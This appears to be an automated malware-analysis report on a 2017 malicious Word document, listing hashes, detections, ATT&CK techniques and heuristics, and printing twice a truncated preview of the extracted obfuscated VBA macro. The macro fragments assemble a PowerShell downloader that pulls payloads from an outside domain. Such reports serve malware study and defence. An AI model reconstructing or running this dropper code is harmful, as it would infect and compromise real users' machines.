Office (OLE) malware analysis — malicious · a73924f6b3bc139c

MALICIOUS

Office (OLE)

191.5 KB Created: 2017-12-27 14:33:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 5f58ae772d7eab98385d07c8f4b7886e SHA-1: d03c0e59184eac1988f237a2529934998980e267 SHA-256: a73924f6b3bc139c6f2365bc45eb1fa7727d6bfcea45ed3f9b21f97995d3daae

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command, indicating an attempt to execute arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a lure for phishing or dropping further malicious content. The obfuscated script content prevents a more detailed analysis of the payload, but the presence of Shell() and the heuristic firings strongly suggest a downloader or dropper functionality.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70254 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70254 bytes
SHA-256: `aa95c8479391df8048c73368c2d69ea8547739ca5fb022d63d70b4cdf9a5f590`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mVRnBHjdcqU" Function RRMvDcXzTUtS() On Error Resume Next jZGINzwIT = 871 / Rnd(4) + ADBRwIuCANT + wHQVuHoJUH * 9 + Int(oLROjVEuk * CStr(aZVtJbPvWHh)) + kJYUVBKQBGtn * CDate(3624 - 352183467 * 84 / 475) / FjtOjvSi - CSng(620) ovcBzEojNDJ = 871 / Rnd(4) + UqopNzaBoHVOVH + bIQARKTQP * 9 + Int(mXCLPzaJMzhqQV * CStr(MwtPLuUZuQNz)) + ppAZZuaaY * CDate(3624 - 352183467 * 84 / 475) / YHvFIHjkrvSEL - CSng(620) dIECrKBMzN = Mid("swizjWK8MHqz5CNzdi0Y9L8MnF8InKVkpvvj( $VERBosePREfEreNcE.TOsTRiNG()[1,3]+'x'-jOin'')( (('& ( qINENV:pU2t", 37, 66) rFUEScsicOw = 871 / Rnd(4) + YivckfYOzAiDbI + LzCkUbTfhjDuV * 9 + Int(pLPCqkpZtQi * CStr(nItFJiYDChsiN)) + ECNvhlChH * CDate(3624 - 352183467 * 84 / 475) / SAkXAmGmFdoLm - CSng(620) uLYvcijv = 871 / Rnd(4) + nWaYZiDBBjBzjK + qRDRuvijvJftW * 9 + Int(RJhHQDqzkdjmj * CStr(zoRuKXWQ)) + mJzFniPu * CDate(3624 - 352183467 * 84 / 475) / jKjaTpSHzqjZ - CSng(620) jMWYK = 871 / Rnd(4) + XYWRdIShoYj + MzjtoFAFmIuB * 9 + Int(QaGdkds * CStr(lYJOkEzVl)) + LqNaJDLp * CDate(3624 - 352183467 * 84 / 475) / KhpOdVONhMDE - CSng(620) jpsqvQNsPf = Mid("qtznfdHnFErQE+gQEuk/gQhmj+hmjE+gQEigQE+gQE'+'Mpi/sjq'+'.SpgQ'+'E+gQElgQE+gQEit(gQE+gQEsjq,gQE+gQEsjgQE+gQEqgQE+gQE);gQE+gQEfbZokqPLjdw", 12, 113) cNTVczm = 871 / Rnd(4) + IOZlHrljzUBA + zRzDUVjvFWZXUc * 9 + Int(CXfjjBAkfBW * CStr(JChqiaYsAJ)) + WLqpDszOnPIjbo * CDate(3624 - 352183467 * 84 / 475) / RtwhRBzza - CSng(620) rUqHza = 871 / Rnd(4) + iFWUkzviG + LaqYMhjcYrZ * 9 + Int(TumwQhKOrVLG * CStr(NIHDUsdvBZhls)) + zruTmsw * CDate(3624 - 352183467 * 84 / 475) / bhohOUropPjj - CSng(620) zfiAmkN = 871 / Rnd(4) + YjrzwjbtbJXsM + rjnjIAVFBPJivT * 9 + Int(uYOQvfMIQqfhn * CStr(fvYjzpl)) + NoZXSiboR * CDate(3624 - 352183467 * 84 / 475) / HBhkIcQSfXWsd - CSng(620) GHXiOj = Mid("43tkpmi3EJUlHcdSUEWQE+gQEhmj+hmjopgQ'+'E+gQE.chmj+hmjomgQE+gQE/hmj+hmjWgQE+g'+'QEpDpVgQE+'+'gQE1/gQE+gQE,hgQ'+'E+gQEttp://henrycgQE+gQEorgQE+gQErea'+'deagQE+g'+'hmj+hmjQEraujogQE+gQEhmj+hmj.g663htUKtEoWJzBYnmil4", 20, 172) PYBiIzuS = 871 / Rnd(4) + ZZZEwwqRVELYbM + zBYOsbjZPm * 9 + Int(IDNjSBIGYRV * CStr(nwGUGccJn)) + UqoqVqYs * CDate(3624 - 352183467 * 84 / 475) / JRVnnElmJPUoFc - CSng(620) tDEfv = 871 / Rnd(4) + JsWbNRNPo + mWOiifpz * 9 + Int(KcwNkulaMwDF * CStr(EmYwoCjU)) + YcjhnFIabimqXq * CDate(3624 - 352183467 * 84 / 475) / imhcqATk - CSng(620) idaWRDaf = 871 / Rnd(4) + lRmGawmdqBiW + bfSifRLzRISQVq * 9 + Int(uSTPNCEDE * CStr(SCWofmEhq)) + izlInRoT * CDate(3624 - 352183467 * 84 / 475) / TqFGTjXi - CSng(620) MFzhLfbLo = Mid("NknpOILiOTkUnIh44inrfQT42QEt SygQE+gQ'+'lDP0QTsrh6v", 26, 15) ForEr = 871 / Rnd(4) + iRbJfrm + MPEUhDHfS * 9 + Int(UZTRjvMUCVHi * CStr(FrcCVdwukrYdIm)) + wiZwXOwLkMljz * CDate(3624 - 352183467 * 84 / 475) / pRFiUzcF - CSng(620) jtrzi = 871 / Rnd(4) + ZXwZCYUzvS + WkokPYUOhfB * 9 + Int(FjOdXfzuMu * CStr(fvLQFDXjamFQ)) + cTtUhmjqYz * CDate(3624 - 352183467 * 84 / 475) / pouwUvXPbCJoE - CSng(620) uBTfijwfwWO = 871 / Rnd(4) + mCUrkiu + XJUYTvLGjGfrp * 9 + Int(zBjuZSvonPqh * CStr(uDXNdqZOXdmVW)) + boswNLCFTHpIbs * CDate(3624 - 352183467 * 84 / 475) / VFhmHRDJsCBQ - CSng(620) cwKhVJQABp = Mid("cBqm7FS9Ihz3ljiaPgQE+gQEXgQE+gQEhmj+hmjlkaragQE+gQEhmj+hmjpgQ'+'E+gQEas = fXlnsgQE+hmj+hmjgQEagQE+gQEdasgQE+gQEd.nextgQE+gQE(1, 3432gQE+gQE45);fgQE+gQEXgQE+gQElhuas =gQ'+SQ", 18, 153) LvZIv = 871 / Rnd(4) + OLJvalzT + BElfMaLrGvTaR * 9 + Int(aPfOpoUS * CStr(pMSbZuzOrVw)) + siQLpPLDtkhwB * CDate(3624 - 352183467 * 84 / 475) / jvWKiWjZwStw - CSng(620) YHaGb = 871 / Rnd(4) + ZzDuopPWYV + NqivKtSifoXM * 9 + Int(hflEOhDJS * CStr(PtjdkFTjQZbhQl)) + GspMPjBkoMIEKH * CDate(3624 - 352183467 * 84 / 475) / SbvrPCbPhdLEH - CSng(620) isXiCXdT = 871 / Rnd(4) + zIjcEUQihPDz + JPlFfWZqOC * 9 + Int(jraJSmzRrdOuM * CStr(cclAzjTL)) + NToqnXY * CDate(3624 - 352183467 * 84 / 475) / iGovNuGP ... (truncated)

SHA-256: aa95c8479391df8048c73368c2d69ea8547739ca5fb022d63d70b4cdf9a5f590

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mVRnBHjdcqU"
Function RRMvDcXzTUtS()
On Error Resume Next
jZGINzwIT = 871 / Rnd(4) + ADBRwIuCANT + wHQVuHoJUH * 9 + Int(oLROjVEuk * CStr(aZVtJbPvWHh)) + kJYUVBKQBGtn * CDate(3624 - 352183467 * 84 / 475) / FjtOjvSi - CSng(620)
ovcBzEojNDJ = 871 / Rnd(4) + UqopNzaBoHVOVH + bIQARKTQP * 9 + Int(mXCLPzaJMzhqQV * CStr(MwtPLuUZuQNz)) + ppAZZuaaY * CDate(3624 - 352183467 * 84 / 475) / YHvFIHjkrvSEL - CSng(620)
dIECrKBMzN = Mid("swizjWK8MHqz5CNzdi0Y9L8MnF8InKVkpvvj( $VERBosePREfEreNcE.TOsTRiNG()[1,3]+'x'-jOin'')( (('& ( qINENV:pU2t", 37, 66)
rFUEScsicOw = 871 / Rnd(4) + YivckfYOzAiDbI + LzCkUbTfhjDuV * 9 + Int(pLPCqkpZtQi * CStr(nItFJiYDChsiN)) + ECNvhlChH * CDate(3624 - 352183467 * 84 / 475) / SAkXAmGmFdoLm - CSng(620)
uLYvcijv = 871 / Rnd(4) + nWaYZiDBBjBzjK + qRDRuvijvJftW * 9 + Int(RJhHQDqzkdjmj * CStr(zoRuKXWQ)) + mJzFniPu * CDate(3624 - 352183467 * 84 / 475) / jKjaTpSHzqjZ - CSng(620)
jMWYK = 871 / Rnd(4) + XYWRdIShoYj + MzjtoFAFmIuB * 9 + Int(QaGdkds * CStr(lYJOkEzVl)) + LqNaJDLp * CDate(3624 - 352183467 * 84 / 475) / KhpOdVONhMDE - CSng(620)
jpsqvQNsPf = Mid("qtznfdHnFErQE+gQEuk/gQhmj+hmjE+gQEigQE+gQE'+'Mpi/sjq'+'.SpgQ'+'E+gQElgQE+gQEit(gQE+gQEsjq,gQE+gQEsjgQE+gQEqgQE+gQE);gQE+gQEfbZokqPLjdw", 12, 113)
cNTVczm = 871 / Rnd(4) + IOZlHrljzUBA + zRzDUVjvFWZXUc * 9 + Int(CXfjjBAkfBW * CStr(JChqiaYsAJ)) + WLqpDszOnPIjbo * CDate(3624 - 352183467 * 84 / 475) / RtwhRBzza - CSng(620)
rUqHza = 871 / Rnd(4) + iFWUkzviG + LaqYMhjcYrZ * 9 + Int(TumwQhKOrVLG * CStr(NIHDUsdvBZhls)) + zruTmsw * CDate(3624 - 352183467 * 84 / 475) / bhohOUropPjj - CSng(620)
zfiAmkN = 871 / Rnd(4) + YjrzwjbtbJXsM + rjnjIAVFBPJivT * 9 + Int(uYOQvfMIQqfhn * CStr(fvYjzpl)) + NoZXSiboR * CDate(3624 - 352183467 * 84 / 475) / HBhkIcQSfXWsd - CSng(620)
GHXiOj = Mid("43tkpmi3EJUlHcdSUEWQE+gQEhmj+hmjopgQ'+'E+gQE.chmj+hmjomgQE+gQE/hmj+hmjWgQE+g'+'QEpDpVgQE+'+'gQE1/gQE+gQE,hgQ'+'E+gQEttp://henrycgQE+gQEorgQE+gQErea'+'deagQE+g'+'hmj+hmjQEraujogQE+gQEhmj+hmj.g663htUKtEoWJzBYnmil4", 20, 172)
PYBiIzuS = 871 / Rnd(4) + ZZZEwwqRVELYbM + zBYOsbjZPm * 9 + Int(IDNjSBIGYRV * CStr(nwGUGccJn)) + UqoqVqYs * CDate(3624 - 352183467 * 84 / 475) / JRVnnElmJPUoFc - CSng(620)
tDEfv = 871 / Rnd(4) + JsWbNRNPo + mWOiifpz * 9 + Int(KcwNkulaMwDF * CStr(EmYwoCjU)) + YcjhnFIabimqXq * CDate(3624 - 352183467 * 84 / 475) / imhcqATk - CSng(620)
idaWRDaf = 871 / Rnd(4) + lRmGawmdqBiW + bfSifRLzRISQVq * 9 + Int(uSTPNCEDE * CStr(SCWofmEhq)) + izlInRoT * CDate(3624 - 352183467 * 84 / 475) / TqFGTjXi - CSng(620)
MFzhLfbLo = Mid("NknpOILiOTkUnIh44inrfQT42QEt SygQE+gQ'+'lDP0QTsrh6v", 26, 15)
ForEr = 871 / Rnd(4) + iRbJfrm + MPEUhDHfS * 9 + Int(UZTRjvMUCVHi * CStr(FrcCVdwukrYdIm)) + wiZwXOwLkMljz * CDate(3624 - 352183467 * 84 / 475) / pRFiUzcF - CSng(620)
jtrzi = 871 / Rnd(4) + ZXwZCYUzvS + WkokPYUOhfB * 9 + Int(FjOdXfzuMu * CStr(fvLQFDXjamFQ)) + cTtUhmjqYz * CDate(3624 - 352183467 * 84 / 475) / pouwUvXPbCJoE - CSng(620)
uBTfijwfwWO = 871 / Rnd(4) + mCUrkiu + XJUYTvLGjGfrp * 9 + Int(zBjuZSvonPqh * CStr(uDXNdqZOXdmVW)) + boswNLCFTHpIbs * CDate(3624 - 352183467 * 84 / 475) / VFhmHRDJsCBQ - CSng(620)
cwKhVJQABp = Mid("cBqm7FS9Ihz3ljiaPgQE+gQEXgQE+gQEhmj+hmjlkaragQE+gQEhmj+hmjpgQ'+'E+gQEas = fXlnsgQE+hmj+hmjgQEagQE+gQEdasgQE+gQEd.nextgQE+gQE(1, 3432gQE+gQE45);fgQE+gQEXgQE+gQElhuas =gQ'+SQ", 18, 153)
LvZIv = 871 / Rnd(4) + OLJvalzT + BElfMaLrGvTaR * 9 + Int(aPfOpoUS * CStr(pMSbZuzOrVw)) + siQLpPLDtkhwB * CDate(3624 - 352183467 * 84 / 475) / jvWKiWjZwStw - CSng(620)
YHaGb = 871 / Rnd(4) + ZzDuopPWYV + NqivKtSifoXM * 9 + Int(hflEOhDJS * CStr(PtjdkFTjQZbhQl)) + GspMPjBkoMIEKH * CDate(3624 - 352183467 * 84 / 475) / SbvrPCbPhdLEH - CSng(620)
isXiCXdT = 871 / Rnd(4) + zIjcEUQihPDz + JPlFfWZqOC * 9 + Int(jraJSmzRrdOuM * CStr(cclAzjTL)) + NToqnXY * CDate(3624 - 352183467 * 84 / 475) / iGovNuGP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.